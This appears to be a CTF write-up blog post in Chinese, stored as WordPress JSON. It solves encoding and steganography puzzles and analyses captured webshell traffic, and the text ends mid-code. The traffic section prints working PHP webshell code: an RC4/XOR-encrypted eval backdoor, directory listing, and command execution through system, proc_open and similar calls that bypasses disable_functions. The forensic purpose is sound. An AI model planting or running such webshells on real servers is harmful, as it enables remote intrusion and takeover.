{"id":886,"date":"2026-02-08T21:05:03","date_gmt":"2026-02-08T13:05:03","guid":{"rendered":"http:\/\/shr1mp.top\/?p=886"},"modified":"2026-03-17T21:01:52","modified_gmt":"2026-03-17T13:01:52","slug":"%e6%96%b0%e6%98%a5%e6%9d%afsdpcctf","status":"publish","type":"post","link":"http:\/\/shr1mp.top\/index.php\/2026\/02\/08\/%e6%96%b0%e6%98%a5%e6%9d%afsdpcctf\/","title":{"rendered":"\u65b0\u6625\u676fSDPC::CTF"},"content":{"rendered":"\n

\uff1f\uff1f\uff1fesab<\/h2>\n\n\n\n

\u7ed9\u4e86\u4e2atxt\uff1a<\/p>\n\n\n\n

jJuPnIyanISosKignJCTk6Cdnoyaycvegv==<\/code><\/pre>\n\n\n\n
\u5173\u6ce8\u5230\u9644\u4ef6\u540d\u5b5746esab\uff0c\u8fd9\u662fBase64\u7684\u5012\u7740\u5199\uff0c\u6545\u800c\u8fd9\u4e2a\u9898\u7684\u7801\u8868\u4e5f\u662f\u5012\u7740\u7684<\/p>\n\n\n\n
\/+9876543210zyxwvutsrqponmlkjihgfedcbaZYXWVUTSRQPONMLKJIHGFEDCBA<\/code><\/pre>\n\n\n\n
\u89e3\u51fa\u6765<\/p>\n\n\n\n
sdpcsec{WOW_coll_base64!}<\/code><\/pre>\n\n\n\n
CSGO<\/h2>\n\n\n\n
\u7ed9\u4e86\u4e00\u4e2ajpg\u548c\u4e00\u4e2amp4\u6587\u4ef6<\/p>\n\n\n\n
\u6ce8\u610f\u5230jpg\u672b\u5c3e\u6709\u9690\u5199<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
\u8fd9\u6bb5Base64\u89e3\u51fa\u6765\u662f\uff1a<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
MP4\u6587\u4ef6\u7528binwalkforemost\u8fdb\u884c\u6587\u4ef6\u63d0\u53d6\uff0c\u53d1\u73b0\u85cf\u4e86\u4e2a\u52a0\u5bc6\u7684zip\uff0c\u4f7f\u7528\u5bc6\u7801\u89e3\u5f00\uff0c\u6709bmp\u6587\u4ef6<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
\u53d1\u73b00\u901a\u9053\u5b58\u5728LSB\u9690\u5199<\/p>\n\n\n\n
\u53ea\u5f00\u4e00\u4e2a\u901a\u9053\u53ef\u4ee5\u770b\u5230flag\uff08\u5982\u679cRGB\u591a\u4e2a\u5f00\u7684\u8bdd\u5b58\u5728\u4e71\u7801\uff09<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
\u789f\u4e2d\u8c0d2.0<\/h2>\n\n\n\n
\u6d413<\/p>\n\n\n\n
68a943=%40eval(%40base64_decode(%24_POST%5B'td48c7e666f11'%5D))%3B&td48c7e666f11=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwgIjAiKTtAc2V0X3RpbWVfbGltaXQoMCk7JG9wZGlyPUBpbmlfZ2V0KCJvcGVuX2Jhc2VkaXIiKTtpZigkb3BkaXIpIHskb2N3ZD1kaXJuYW1lKCRfU0VSVkVSWyJTQ1JJUFRfRklMRU5BTUUiXSk7JG9wYXJyPXByZWdfc3BsaXQoYmFzZTY0X2RlY29kZSgiTHp0OE9pOD0iKSwkb3BkaXIpO0BhcnJheV9wdXNoKCRvcGFyciwkb2N3ZCxzeXNfZ2V0X3RlbXBfZGlyKCkpO2ZvcmVhY2goJG9wYXJyIGFzICRpdGVtKSB7aWYoIUBpc193cml0YWJsZSgkaXRlbSkpe2NvbnRpbnVlO307JHRtZGlyPSRpdGVtLiIvLjgyYzUzMmRiNGY0IjtAbWtkaXIoJHRtZGlyKTtpZighQGZpbGVfZXhpc3RzKCR0bWRpcikpe2NvbnRpbnVlO30kdG1kaXI9cmVhbHBhdGgoJHRtZGlyKTtAY2hkaXIoJHRtZGlyKTtAaW5pX3NldCgib3Blbl9iYXNlZGlyIiwgIi4uIik7JGNudGFycj1AcHJlZ19zcGxpdCgiL1xcXFx8XC8vIiwkdG1kaXIpO2ZvcigkaT0wOyRpPHNpemVvZigkY250YXJyKTskaSsrKXtAY2hkaXIoIi4uIik7fTtAaW5pX3NldCgib3Blbl9iYXNlZGlyIiwiLyIpO0BybWRpcigkdG1kaXIpO2JyZWFrO307fTs7ZnVuY3Rpb24gYXNlbmMoJG91dCl7cmV0dXJuICRvdXQ7fTtmdW5jdGlvbiBhc291dHB1dCgpeyRvdXRwdXQ9b2JfZ2V0X2NvbnRlbnRzKCk7b2JfZW5kX2NsZWFuKCk7ZWNobyAiODIiLiJjNmEiO2VjaG8gQGFzZW5jKCRvdXRwdXQpO2VjaG8gImFkNjdkMCIuIjMyNjkyZCI7fW9iX3N0YXJ0KCk7dHJ5eyREPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTtpZigkRD09IiIpJEQ9ZGlybmFtZSgkX1NFUlZFUlsiUEFUSF9UUkFOU0xBVEVEIl0pOyRSPSJ7JER9CSI7aWYoc3Vic3RyKCRELDAsMSkhPSIvIil7Zm9yZWFjaChyYW5nZSgiQyIsIloiKWFzICRMKWlmKGlzX2RpcigieyRMfToiKSkkUi49InskTH06Ijt9ZWxzZXskUi49Ii8iO30kUi49IgkiOyR1PShmdW5jdGlvbl9leGlzdHMoInBvc2l4X2dldGVnaWQiKSk%2FQHBvc2l4X2dldHB3dWlkKEBwb3NpeF9nZXRldWlkKCkpOiIiOyRzPSgkdSk%2FJHVbIm5hbWUiXTpAZ2V0X2N1cnJlbnRfdXNlcigpOyRSLj1waHBfdW5hbWUoKTskUi49Igl7JHN9IjtlY2hvICRSOzt9Y2F0Y2goRXhjZXB0aW9uICRlKXtlY2hvICJFUlJPUjovLyIuJGUtPmdldE1lc3NhZ2UoKTt9O2Fzb3V0cHV0KCk7ZGllKCk7<\/code><\/pre>\n\n\n\n
\u6d414\uff1a<\/p>\n\n\n\n
68a943=%40eval(%40base64_decode(%24_POST%5B'fa9ca2ea581f5f'%5D))%3B&cf7c7a6ae14ee6=RCRDovcGhwc3R1ZHlfcHJvL1dXVy9kZWZhdWx0L2ltcG9zc2libGUucGhw&fa9ca2ea581f5f=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwgIjAiKTtAc2V0X3RpbWVfbGltaXQoMCk7JG9wZGlyPUBpbmlfZ2V0KCJvcGVuX2Jhc2VkaXIiKTtpZigkb3BkaXIpIHskb2N3ZD1kaXJuYW1lKCRfU0VSVkVSWyJTQ1JJUFRfRklMRU5BTUUiXSk7JG9wYXJyPXByZWdfc3BsaXQoYmFzZTY0X2RlY29kZSgiTHp0OE9pOD0iKSwkb3BkaXIpO0BhcnJheV9wdXNoKCRvcGFyciwkb2N3ZCxzeXNfZ2V0X3RlbXBfZGlyKCkpO2ZvcmVhY2goJG9wYXJyIGFzICRpdGVtKSB7aWYoIUBpc193cml0YWJsZSgkaXRlbSkpe2NvbnRpbnVlO307JHRtZGlyPSRpdGVtLiIvLmUyNTliYiI7QG1rZGlyKCR0bWRpcik7aWYoIUBmaWxlX2V4aXN0cygkdG1kaXIpKXtjb250aW51ZTt9JHRtZGlyPXJlYWxwYXRoKCR0bWRpcik7QGNoZGlyKCR0bWRpcik7QGluaV9zZXQoIm9wZW5fYmFzZWRpciIsICIuLiIpOyRjbnRhcnI9QHByZWdfc3BsaXQoIi9cXFxcfFwvLyIsJHRtZGlyKTtmb3IoJGk9MDskaTxzaXplb2YoJGNudGFycik7JGkrKyl7QGNoZGlyKCIuLiIpO307QGluaV9zZXQoIm9wZW5fYmFzZWRpciIsIi8iKTtAcm1kaXIoJHRtZGlyKTticmVhazt9O307O2Z1bmN0aW9uIGFzZW5jKCRvdXQpe3JldHVybiAkb3V0O307ZnVuY3Rpb24gYXNvdXRwdXQoKXskb3V0cHV0PW9iX2dldF9jb250ZW50cygpO29iX2VuZF9jbGVhbigpO2VjaG8gIjdlZDMiLiJmYThhIjtlY2hvIEBhc2VuYygkb3V0cHV0KTtlY2hvICI2ZTIzMCIuIjJkOWY2OCI7fW9iX3N0YXJ0KCk7dHJ5eyRmPWJhc2U2NF9kZWNvZGUoc3Vic3RyKCRfUE9TVFsiY2Y3YzdhNmFlMTRlZTYiXSwyKSk7JGM9JF9QT1NUWyJxYjY1Zjk5NzEzMDcwMSJdOyRjPXN0cl9yZXBsYWNlKCJcciIsIiIsJGMpOyRjPXN0cl9yZXBsYWNlKCJcbiIsIiIsJGMpOyRidWY9IiI7Zm9yKCRpPTA7JGk8c3RybGVuKCRjKTskaSs9MikkYnVmLj11cmxkZWNvZGUoIiUiLnN1YnN0cigkYywkaSwyKSk7ZWNobyhAZndyaXRlKGZvcGVuKCRmLCJhIiksJGJ1Zik%2FIjEiOiIwIik7O31jYXRjaChFeGNlcHRpb24gJGUpe2VjaG8gIkVSUk9SOi8vIi4kZS0%2BZ2V0TWVzc2FnZSgpO307YXNvdXRwdXQoKTtkaWUoKTs%3D&qb65f997130701=3C3F7068700A406572726F725F7265706F7274696E672830293B0A66756E6374696F6E2044656372797074282464617461290A7B0A20202020246B6579203D202265343565333239666562356439323562223B200A202020200A20202020246273203D20226261736536345F22202E20226465636F6465223B0A202020202464617461203D20246273282464617461293B0A0A20202020247077645F6C656E677468203D207374726C656E28246B6579293B0A2020202024646174615F6C656E677468203D207374726C656E282464617461293B0A2020202024636970686572203D2027273B0A20202020202020200A202020202473203D20617272617928293B0A20202020666F7220282469203D20303B202469203C203235363B2024692B2B29207B0A202020202020202024735B24695D203D2024693B0A202020207D0A20202020202020200A20202020246A203D20303B0A20202020666F7220282469203D20303B202469203C203235363B2024692B2B29207B0A2020202020202020246A203D2028246A202B2024735B24695D202B206F726428246B65795B2469202520247077645F6C656E6774685D29292025203235363B0A202020202020202024746D70203D2024735B24695D3B0A202020202020202024735B24695D203D2024735B246A5D3B0A202020202020202024735B246A5D203D2024746D703B0A202020207D0A20202020202020200A202020202469203D20303B0A20202020246A203D20303B0A20202020666F722028246B203D20303B20246B203C2024646174615F6C656E6774683B20246B2B2B29207B0A20202020202020202469203D20282469202B2031292025203235363B0A2020202020202020246A203D2028246A202B2024735B24695D292025203235363B0A202020202020202024746D70203D2024735B24695D3B0A202020202020202024735B24695D203D2024735B246A5D3B0A202020202020202024735B246A5D203D2024746D703B0A20202020202020200A202020202020202024636970686572202E3D2024646174615B246B5D205E206368722824735B2824735B24695D202B2024735B246A5D292025203235365D293B0A202020207D0A202020200A20202020666F72282469203D20303B202469203C207374726C656E2824636970686572293B2024692B2B29207B0A2020202020202020246369706865725B24695D203D20246369706865725B24695D205E20246B65795B24692B312631355D3B200A202020207D0A0A2020202072657475726E20246369706865723B0A7D0A24706F73743D446563727970742866696C655F6765745F636F6E74656E747328227068703A2F2F696E7075742229293B0A406576616C2824706F7374293B0A3F3E<\/code><\/pre>\n\n\n\n
\u5176\u4e2d\u6d414\u768416\u8fdb\u5236\u89e3\u51fa\u6765\u5f97\u5230\u52a0\u5bc6\u89c4\u5219\uff08\u4ee3\u7801\u7684\u8bdd\u670d\u52a1\u5668\u4f1a\u8bef\u5224webshell\uff0c\u81ea\u52a8\u5220\u9664T_T\uff09<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
\u56e0\u6b64\u57fa\u672c\u7684\u89e3\u5bc6\u5c31\u662f<\/p>\n\n\n\n
Base64--->rc4----->xor\n\u5176\u4e2dkey\u662fe45e329feb5d925b\uff08\u8681\u5251\u9ed8\u8ba4key\uff09<\/code><\/pre>\n\n\n\n
3\u30014\u30015\u90fd\u662f\u53c2\u6570\u7684\u4f20\u5165\uff0c6\u662fget\u8bf7\u6c42\uff0c\u771f\u6b63\u7684\u64cd\u4f5c\u4ece7\u5f00\u59cb<\/p>\n\n\n\n
\u6d417<\/p>\n\n\n\n
$post=Decrypt(file_get_contents(\"php:\/\/input\"));\n@eval($post);\n?>\n \/\/ \u5173\u952e\u4ee3\u7801\u89e3\u6790\n$D = base64_decode(substr($_POST[\"\u53c2\u6570\u540d\"], 2));  \/\/ \u89e3\u7801\u76ee\u5f55\u8def\u5f84\n$F = @opendir($D);  \/\/ \u6253\u5f00\u76ee\u5f55\nwhile($N = @readdir($F)) {\n    $P = $D . $N;  \/\/ \u5b8c\u6574\u8def\u5f84\n    $T = @date(\"Y-m-d H:i:s\", @filemtime($P));  \/\/ \u4fee\u6539\u65f6\u95f4\n    $E = substr(base_convert(@fileperms($P), 10, 8), -4);  \/\/ \u6743\u9650(\u5982 0755)\n    $R = \"\\t\" . $T . \"\\t\" . @filesize($P) . \"\\t\" . $E . \"\\n\";\n    \n    if(@is_dir($P)) \n        $M .= $N . \"\/\" . $R;  \/\/ \u76ee\u5f55\u6536\u96c6\u5230 $M\n    else \n        $L .= $N . $R;        \/\/ \u6587\u4ef6\u6536\u96c6\u5230 $L\n}\necho $M . $L;  \/\/ \u5148\u8f93\u51fa\u76ee\u5f55\uff0c\u518d\u8f93\u51fa\u6587\u4ef6\n----------------------------------------------------------------------\n@error_reporting(0);\nfunction main($content)\n{\n    $result = array();\n    $result[\"status\"] = base64_encode(\"success\");\n    $result[\"msg\"] = base64_encode($content);\n    @session_start();  \/\/\u521d\u59cb\u5316session\uff0c\u907f\u514dconnect\u4e4b\u540e\u76f4\u63a5background\uff0c\u540e\u7eedgetresult\u65e0\u6cd5\u83b7\u53d6cookie\n    echo encrypt(json_encode($result));\n}\nfunction Encrypt($data)\n{\n    $key = \"e45e329feb5d925b\"; \n    for($i = 0; $i < strlen($data); $i++) {\n        $data[$i] = $data[$i] ^ $key[$i+1&15]; \n    }  \n    $pwd_length = strlen($key);\n    $data_length = strlen($data);\n    $cipher = '';        \n    $s = array();\n    for ($i = 0; $i < 256; $i++) {\n        $s[$i] = $i;\n    }\n        \n    $j = 0;\n    for ($i = 0; $i < 256; $i++) {\n        $j = ($j + $s[$i] + ord($key[$i % $pwd_length])) % 256;\n            \n        $tmp = $s[$i];\n        $s[$i] = $s[$j];\n        $s[$j] = $tmp;\n    }\n        \n    $i = 0;\n    $j = 0;\n    for ($k = 0; $k < $data_length; $k++) {\n        $i = ($i + 1) % 256;\n        $j = ($j + $s[$i]) % 256;\n            \n        $tmp = $s[$i];\n        $s[$i] = $s[$j];\n        $s[$j] = $tmp;\n            \n        $cipher .= $data[$k] ^ chr($s[($s[$i] + $s[$j]) % 256]);\n    }\n    \n    $bs = \"base64_\" . \"encode\";\n    $after = $bs($cipher);\n    \n    return $after;\n}\n$content=\"SEp2TUNFRVZpWGx3cG8ycm5WM0tEcHlKcXp0UE90VFMzWmdIZzFDQ20xa0phSUVRVUFVazBZNU4xNkNoMEhxSUF6R2lxODlPMFU5dG54cFRpanoxcnRucUhpQXR6RkpKN3dVV3RiandpNkxHWGxNeUZXdjFPc1p5VnVCNVNFalVTM00xOG9zOHl5aWY1aGpkeklxdzZKMXNwUHBjY1U0aXV3\";$content=base64_decode($content);\nmain($content);\n-----------------------------------------------------\n7\uff082\uff09\nerror_reporting(0);\nfunction main($whatever) {\n    $result = array();\n    ob_start(); phpinfo(); $info = ob_get_contents(); ob_end_clean();\n    $driveList =\"\";\n        return $s0;\n    }else{\n        return iconv('gbk','utf-8\/\/IGNORE',$str);\n    }\n}\nfunction main($cmd,$path)\n{\n    @set_time_limit(0);\n    @ignore_user_abort(1);\n    @ini_set('max_execution_time', 0);\n    $result = array();\n    $PadtJn = @ini_get('disable_functions');\n    if (! empty($PadtJn)) {\n        $PadtJn = preg_replace('\/[, ]+\/', ',', $PadtJn);\n        $PadtJn = explode(',', $PadtJn);\n        $PadtJn = array_map('trim', $PadtJn);\n    } else {\n        $PadtJn = array();\n    }\n    $c = $cmd;\n    if (FALSE !== strpos(strtolower(PHP_OS), 'win')) {\n        $c = $c . \" 2>&1\\n\";\n    }\n    $JueQDBH = 'is_callable';\n    $Bvce = 'in_array';\n    if ($JueQDBH('system') and ! $Bvce('system', $PadtJn)) {\n        ob_start();\n        system($c);\n        $kWJW = ob_get_contents();\n        ob_end_clean();\n    } else if ($JueQDBH('proc_open') and ! $Bvce('proc_open', $PadtJn)) {\n        $handle = proc_open($c, array(\n            array(\n                'pipe',\n                'r'\n            ),\n            array(\n                'pipe',\n                'w'\n            ),\n            array(\n                'pipe',\n                'w'\n            )\n        ), $pipes);\n        $kWJW = NULL;\n        while (! feof($pipes[1])) {\n            $kWJW .= fread($pipes[1], 1024);\n        }\n        @proc_close($handle);\n    } else if ($JueQDBH('passthru') and ! $Bvce('passthru', $PadtJn)) {\n        ob_start();\n        passthru($c);\n        $kWJW = ob_get_contents();\n        ob_end_clean();\n    } else if ($JueQDBH('shell_exec') and ! $Bvce('shell_exec', $PadtJn)) {\n        $kWJW = shell_exec($c);\n    } else if ($JueQDBH('exec') and ! $Bvce('exec', $PadtJn)) {\n        $kWJW = array();\n        exec($c, $kWJW);\n        $kWJW = join(chr(10), $kWJW) . chr(10);\n    } else if ($JueQDBH('exec') and ! $Bvce('popen', $PadtJn)) {\n        $fp = popen($c, 'r');\n        $kWJW = NULL;\n        if (is_resource($fp)) {\n            while (! feof($fp)) {\n                $kWJW .= fread($fp, 1024);\n            }\n        }\n        @pclose($fp);\n    } else {\n        $kWJW = 0;\n        $result[\"status\"] = base64_encode(\"fail\");\n        $result[\"msg\"] = base64_encode(\"none of proc_open\/passthru\/shell_exec\/exec\/exec is available\");\n        $key = $_SESSION['k'];\n        echo encrypt(json_encode($result));\n        return;\n        \n    }\n    $result[\"status\"] = base64_encode(\"success\");\n    $result[\"msg\"] = base64_encode(getSafeStr($kWJW));\n    echo encrypt(json_encode($result));\n}\nfunction Encrypt($data)\n{\n    $key = \"e45e329feb5d925b\"; \n    for($i = 0; $i < strlen($data); $i++) {\n        $data[$i] = $data[$i] ^ $key[$i+1&15]; \n    }\n    \n    $pwd_length = strlen($key);\n    $data_length = strlen($data);\n    $cipher = '';\n        \n    $s = array();\n    for ($i = 0; $i < 256; $i++) {\n        $s[$i] = $i;\n    }\n        \n    $j = 0;\n    for ($i = 0; $i < 256; $i++) {\n        $j = ($j + $s[$i] + ord($key[$i % $pwd_length])) % 256;\n            \n        $tmp = $s[$i];\n        $s[$i] = $s[$j];\n        $s[$j] = $tmp;\n    }\n        \n    $i = 0;\n    $j = 0;\n    for ($k = 0; $k < $data_length; $k++) {\n        $i = ($i + 1) % 256;\n        $j = ($j + $s[$i]) % 256;\n            \n        $tmp = $s[$i];\n        $s[$i] = $s[$j];\n        $s[$j] = $tmp;\n            \n        $cipher .= $data[$k] ^ chr($s[($s[$i] + $s[$j]) % 256]);\n    }\n    \n    $bs = \"base64_\" . \"encode\";\n    $after = $bs($cipher);\n    \n    return $after;\n}\n$cmd=\"Y2QgL2QgIkQ6XHBocHN0dWR5X3Byb1xXV1dcZGVmYXVsdFwiJmVjaG8gImhlcmUgaXMgbm8gZmxhZyI=\";$cmd=base64_decode($cmd);$path=\"RDovcGhwc3R1ZHlfcHJvL1dXVy9kZWZhdWx0Lw==\";$path=base64_decode($path);\nmain($cmd,$path);\n---------------------------------------------------------\n@error_reporting(0);\nfunction getSafeStr($str){\n    $s1 = iconv('utf-8','gbk\/\/IGNORE',$str);\n    $s0 = iconv('gbk','utf-8\/\/IGNORE',$s1);\n    if($s0 == $str){\n        return $s0;\n    }else{\n        return iconv('gbk','utf-8\/\/IGNORE',$str);\n    }\n}\nfunction main($cmd,$path)\n{\n    @set_time_limit(0);\n    @ignore_user_abort(1);\n    @ini_set('max_execution_time', 0);\n    $result = array();\n    $PadtJn = @ini_get('disable_functions');\n    if (! empty($PadtJn)) {\n        $PadtJn = preg_replace('\/[, ]+\/', ',', $PadtJn);\n        $PadtJn = explode(',', $PadtJn);\n        $PadtJn = array_map('trim', $PadtJn);\n    } else {\n        $PadtJn = array();\n    }\n    $c = $cmd;\n    if (FALSE !== strpos(strtolower(PHP_OS), 'win')) {\n        $c = $c . \" 2>&1\\n\";\n    }\n    $JueQDBH = 'is_callable';\n    $Bvce = 'in_array';\n    if ($JueQDBH('system') and ! $Bvce('system', $PadtJn)) {\n        ob_start();\n        system($c);\n        $kWJW = ob_get_contents();\n        ob_end_clean();\n    } else if ($JueQDBH('proc_open') and ! $Bvce('proc_open', $PadtJn)) {\n        $handle = proc_open($c, array(\n            array(\n                'pipe',\n                'r'\n            ),\n            array(\n                'pipe',\n                'w'\n            ),\n            array(\n                'pipe',\n                'w'\n            )\n        ), $pipes);\n        $kWJW = NULL;\n        while (! feof($pipes[1])) {\n            $kWJW .= fread($pipes[1], 1024);\n        }\n        @proc_close($handle);\n    } else if ($JueQDBH('passthru') and ! $Bvce('passthru', $PadtJn)) {\n        ob_start();\n        passthru($c);\n        $kWJW = ob_get_contents();\n        ob_end_clean();\n    } else if ($JueQDBH('shell_exec') and ! $Bvce('shell_exec', $PadtJn)) {\n        $kWJW = shell_exec($c);\n    } else if ($JueQDBH('exec') and ! $Bvce('exec', $PadtJn)) {\n        $kWJW = array();\n        exec($c, $kWJW);\n        $kWJW = join(chr(10), $kWJW) . chr(10);\n    } else if ($JueQDBH('exec') and ! $Bvce('popen', $PadtJn)) {\n        $fp = popen($c, 'r');\n        $kWJW = NULL;\n        if (is_resource($fp)) {\n            while (! feof($fp)) {\n                $kWJW .= fread($fp, 1024);\n            }\n        }\n        @pclose($fp);\n    } else {\n        $kWJW = 0;\n        $result[\"status\"] = base64_encode(\"fail\");\n        $result[\"msg\"] = base64_encode(\"none of proc_open\/passthru\/shell_exec\/exec\/exec is available\");\n        $key = $_SESSION['k'];\n        echo encrypt(json_encode($result));\n        return;\n    }\n    $result[\"status\"] = base64_encode(\"success\");\n    $result[\"msg\"] = base64_encode(getSafeStr($kWJW));\n    echo encrypt(json_encode($result));\n}\nfunction Encrypt($data)\n{\n    $key = \"e45e329feb5d925b\";\n    for($i = 0; $i < strlen($data); $i++) {\n        $data[$i] = $data[$i] ^ $key[$i+1&15];\n    }\n    $pwd_length = strlen($key);\n    $data_length = strlen($data);\n    $cipher = '';\n    $s = array();\n    for ($i = 0; $i < 256; $i++) {\n        $s[$i] = $i;\n    }\n    $j = 0;\n    for ($i = 0; $i < 256; $i++) {\n        $j = ($j + $s[$i] + ord($key[$i % $pwd_length])) % 256;\n        $tmp = $s[$i];\n        $s[$i] = $s[$j];\n        $s[$j] = $tmp;\n    }\n    $i = 0;\n    $j = 0;\n    for ($k = 0; $k < $data_length; $k++) {\n        $i = ($i + 1) % 256;\n        $j = ($j + $s[$i]) % 256;\n        $tmp = $s[$i];\n        $s[$i] = $s[$j];\n        $s[$j] = $tmp;\n        $cipher .= $data[$k] ^ chr($s[($s[$i] + $s[$j]) % 256]);\n    }\n    $bs = \"base64_\" . \"encode\";\n    $after = $bs($cipher);\n    return $after;\n}\n$cmd=\"Y2QgL2QgIkQ6XHBocHN0dWR5X3Byb1xXV1dcZGVmYXVsdFwiJndob2FtaQ==\";$cmd=base64_decode($cmd);$path=\"RDovcGhwc3R1ZHlfcHJvL1dXVy9kZWZhdWx0Lw==\";$path=base64_decode($path);\nmain($cmd,$path);\n#########cd \/d \"D:\\phpstudy_pro\\WWW\\default\\\"\nwhoami<\/code><\/pre>\n\n\n\n
\u5927\u6982\u5c31\u662f\uff1a<\/p>\n\n\n\n
\u7b2c1\u6b65: Ping\u6d4b\u8bd5 (\u56de\u58f0\u4ee3\u7801)      \u2192 \u9a8c\u8bc1\u901a\u4fe1\n\u7b2c2\u6b65: \u57fa\u672c\u4fe1\u606f\u91c7\u96c6 (\u8fd9\u6bb5\u4ee3\u7801)    \u2192 \u83b7\u53d6phpinfo\u3001\u78c1\u76d8\u3001IP\u7b49 \u2190 \u4f60\u73b0\u5728\u5728\u8fd9\u91cc\n\u7b2c3\u6b65: \u547d\u4ee4\u6267\u884c (\u771f\u6b63\u7684\u653b\u51fb\u4ee3\u7801)  \u2192 \u6267\u884cwhoami\u3001\u4e0a\u4f20\u6587\u4ef6\u7b49<\/code><\/pre>\n\n\n\n
\u6d418\uff1a<\/p>\n\n\n\n
@error_reporting(0);\nfunction getSafeStr($str){\n    $s1 = iconv('utf-8','gbk\/\/IGNORE',$str);\n    $s0 = iconv('gbk','utf-8\/\/IGNORE',$s1);\n    if($s0 == $str){\n        return $s0;\n    }else{\n        return iconv('gbk','utf-8\/\/IGNORE',$str);\n    }\n}\nfunction main($cmd,$path)\n{\n    @set_time_limit(0);\n    @ignore_user_abort(1);\n    @ini_set('max_execution_time', 0);\n    $result = array();\n    $PadtJn = @ini_get('disable_functions');\n    if (! empty($PadtJn)) {\n        $PadtJn = preg_replace('\/[, ]+\/', ',', $PadtJn);\n        $PadtJn = explode(',', $PadtJn);\n        $PadtJn = array_map('trim', $PadtJn);\n    } else {\n        $PadtJn = array();\n    }\n    $c = $cmd;\n    if (FALSE !== strpos(strtolower(PHP_OS), 'win')) {\n        $c = $c . \" 2>&1\\n\";\n    }\n    $JueQDBH = 'is_callable';\n    $Bvce = 'in_array';\n    if ($JueQDBH('system') and ! $Bvce('system', $PadtJn)) {\n        ob_start();\n        system($c);\n        $kWJW = ob_get_contents();\n        ob_end_clean();\n    } else if ($JueQDBH('proc_open') and ! $Bvce('proc_open', $PadtJn)) {\n        $handle = proc_open($c, array(\n            array(\n                'pipe',\n                'r'\n            ),\n            array(\n                'pipe',\n                'w'\n            ),\n            array(\n                'pipe',\n                'w'\n            )\n        ), $pipes);\n        $kWJW = NULL;\n        while (! feof($pipes[1])) {\n            $kWJW .= fread($pipes[1], 1024);\n        }\n        @proc_close($handle);\n    } else if ($JueQDBH('passthru') and ! $Bvce('passthru', $PadtJn)) {\n        ob_start();\n        passthru($c);\n        $kWJW = ob_get_contents();\n        ob_end_clean();\n    } else if ($JueQDBH('shell_exec') and ! $Bvce('shell_exec', $PadtJn)) {\n        $kWJW = shell_exec($c);\n    } else if ($JueQDBH('exec') and ! $Bvce('exec', $PadtJn)) {\n        $kWJW = array();\n        exec($c, $kWJW);\n        $kWJW = join(chr(10), $kWJW) . chr(10);\n    } else if ($JueQDBH('exec') and ! $Bvce('popen', $PadtJn)) {\n        $fp = popen($c, 'r');\n        $kWJW = NULL;\n        if (is_resource($fp)) {\n            while (! feof($fp)) {\n                $kWJW .= fread($fp, 1024);\n            }\n        }\n        @pclose($fp);\n    } else {\n        $kWJW = 0;\n        $result[\"status\"] = base64_encode(\"fail\");\n        $result[\"msg\"] = base64_encode(\"none of proc_open\/passthru\/shell_exec\/exec\/exec is available\");\n        $key = $_SESSION['k'];\n        echo encrypt(json_encode($result));\n        return;\n        \n    }\n    $result[\"status\"] = base64_encode(\"success\");\n    $result[\"msg\"] = base64_encode(getSafeStr($kWJW));\n    echo encrypt(json_encode($result));\n}\nfunction Encrypt($data)\n{\n    $key = \"e45e329feb5d925b\"; \n    for($i = 0; $i < strlen($data); $i++) {\n        $data[$i] = $data[$i] ^ $key[$i+1&15]; \n    }\n    \n    $pwd_length = strlen($key);\n    $data_length = strlen($data);\n    $cipher = '';\n        \n    $s = array();\n    for ($i = 0; $i < 256; $i++) {\n        $s[$i] = $i;\n    }\n        \n    $j = 0;\n    for ($i = 0; $i < 256; $i++) {\n        $j = ($j + $s[$i] + ord($key[$i % $pwd_length])) % 256;\n            \n        $tmp = $s[$i];\n        $s[$i] = $s[$j];\n        $s[$j] = $tmp;\n    }\n        \n    $i = 0;\n    $j = 0;\n    for ($k = 0; $k < $data_length; $k++) {\n        $i = ($i + 1) % 256;\n        $j = ($j + $s[$i]) % 256;\n            \n        $tmp = $s[$i];\n        $s[$i] = $s[$j];\n        $s[$j] = $tmp;\n            \n        $cipher .= $data[$k] ^ chr($s[($s[$i] + $s[$j]) % 256]);\n    }\n    \n    $bs = \"base64_\" . \"encode\";\n    $after = $bs($cipher);\n    \n    return $after;\n}\n$cmd=\"Y2QgL2QgIkQ6XHBocHN0dWR5X3Byb1xXV1dcZGVmYXVsdFwiJmVjaG8gImhlcmUgaXMgbm8gZmxhZyI=\";$cmd=base64_decode($cmd);$path=\"RDovcGhwc3R1ZHlfcHJvL1dXVy9kZWZhdWx0Lw==\";$path=base64_decode($path);\nmain($cmd,$path);\n\u56de\u663ethere is no flag<\/code><\/pre>\n\n\n\n
\u6d419\uff1a<\/p>\n\n\n\n
@error_reporting(0);\nfunction getSafeStr($str){\n    $s1 = iconv('utf-8','gbk\/\/IGNORE',$str);\n    $s0 = iconv('gbk','utf-8\/\/IGNORE',$s1);\n    if($s0 == $str){\n        return $s0;\n    }else{\n        return iconv('gbk','utf-8\/\/IGNORE',$str);\n    }\n}\nfunction main($cmd,$path)\n{\n    @set_time_limit(0);\n    @ignore_user_abort(1);\n    @ini_set('max_execution_time', 0);\n    $result = array();\n    $PadtJn = @ini_get('disable_functions');\n    if (! empty($PadtJn)) {\n        $PadtJn = preg_replace('\/[, ]+\/', ',', $PadtJn);\n        $PadtJn = explode(',', $PadtJn);\n        $PadtJn = array_map('trim', $PadtJn);\n    } else {\n        $PadtJn = array();\n    }\n    $c = $cmd;\n    if (FALSE !== strpos(strtolower(PHP_OS), 'win')) {\n        $c = $c . \" 2>&1\\n\";\n    }\n    $JueQDBH = 'is_callable';\n    $Bvce = 'in_array';\n    if ($JueQDBH('system') and ! $Bvce('system', $PadtJn)) {\n        ob_start();\n        system($c);\n        $kWJW = ob_get_contents();\n        ob_end_clean();\n    } else if ($JueQDBH('proc_open') and ! $Bvce('proc_open', $PadtJn)) {\n        $handle = proc_open($c, array(\n            array(\n                'pipe',\n                'r'\n            ),\n            array(\n                'pipe',\n                'w'\n            ),\n            array(\n                'pipe',\n                'w'\n            )\n        ), $pipes);\n        $kWJW = NULL;\n        while (! feof($pipes[1])) {\n            $kWJW .= fread($pipes[1], 1024);\n        }\n        @proc_close($handle);\n    } else if ($JueQDBH('passthru') and ! 